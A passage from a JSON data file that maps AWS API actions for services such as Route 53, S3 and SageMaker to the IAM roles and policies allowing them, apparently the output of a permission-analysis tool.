{"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"resource-groups:getGroupQuery": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"resource-groups:getTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"resource-groups:listGroupResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"resource-groups:listGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"resource-groups:searchResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:batchDescribeSimulationJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:describeDeploymentJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:describeFleet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:describeRobot": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:describeRobotApplication": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:describeSimulationApplication": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:describeSimulationJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:listDeploymentJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:listFleets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:listRobotApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:listRobots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:listSimulationApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"robomaker:listSimulationJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:GetAccountLimit": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:GetHealthCheck": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:GetHostedZone": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:ListHealthChecks": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:ListHostedZones": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:ListHostedZonesByName": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:ListResourceRecordSets": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"route53:getChange": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getCheckerIpRanges": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getGeoLocation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getHealthCheck": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getHealthCheckCount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getHealthCheckLastFailureReason": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getHealthCheckStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getHostedZone": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getHostedZoneCount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getReusableDelegationSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getTrafficPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getTrafficPolicyInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:getTrafficPolicyInstanceCount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listGeoLocations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listHealthChecks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listHostedZones": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listHostedZonesByName": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listResourceRecordSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listReusableDelegationSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTagsForResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTrafficPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTrafficPolicyInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTrafficPolicyInstancesByHostedZone": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTrafficPolicyInstancesByPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53:listTrafficPolicyVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:checkDomainAvailability": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:getContactReachabilityStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:getDomainDetail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:getOperationDetail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:listDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:listOperations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:listTagsForDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53domains:viewBilling": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53resolver:getResolverRulePolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53resolver:listResolverEndpointIpAddresses": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53resolver:listResolverEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53resolver:listResolverRuleAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53resolver:listResolverRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"route53resolver:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"s3:CreateBucket": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"s3:Get*": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"s3:GetBucketAcl": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:GetBucketLocation": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:GetBucketLogging": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:GetBucketPolicy": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:GetBucketPolicyStatus": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:GetBucketPublicAccessBlock": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:GetBucketVersioning": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:List*": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"s3:ListAllMyBuckets": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:ListBucket": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"s3:getAccelerateConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getAnalyticsConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketAcl": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketCORS": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketLocation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketLogging": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketNotification": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketRequestPayment": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketTagging": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketVersioning": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getBucketWebsite": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getEncryptionConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getInventoryConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getLifecycleConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getMetricsConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:getReplicationConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:listAllMyBuckets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:listBucket": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"s3:listBucketMultipartUploads": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeAlgorithm": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeApp": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeAutoMLJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeCompilationJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeEndpoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeEndpointConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeExperiment": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeHumanTaskUi": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeHyperParameterTuningJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeLabelingJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeModel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeModelPackage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeMonitoringSchedule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeNotebookInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeNotebookInstanceLifecycleConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeProcessingJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeSubscribedWorkteam": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeTrainingJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeTransformJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeTrial": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeTrialComponent": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeUserProfile": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:describeWorkteam": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listAlgorithms": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listApps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listAutoMLJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listCandidatesForAutoMLJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listCodeRepositories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listCompilationJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listEndpointConfigs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listExperiments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listFlowDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listHumanTaskUis": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listHyperParameterTuningJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listLabelingJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listLabelingJobsForWorkteam": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listModelPackages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listModels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listMonitoringExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listMonitoringSchedules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listNotebookInstanceLifecycleConfigs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listNotebookInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listProcessingJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listSubscribedWorkteams": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listTrainingJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listTrainingJobsForHyperParameterTuningJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listTransformJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listTrialComponents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"sagemaker:listTrials": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": 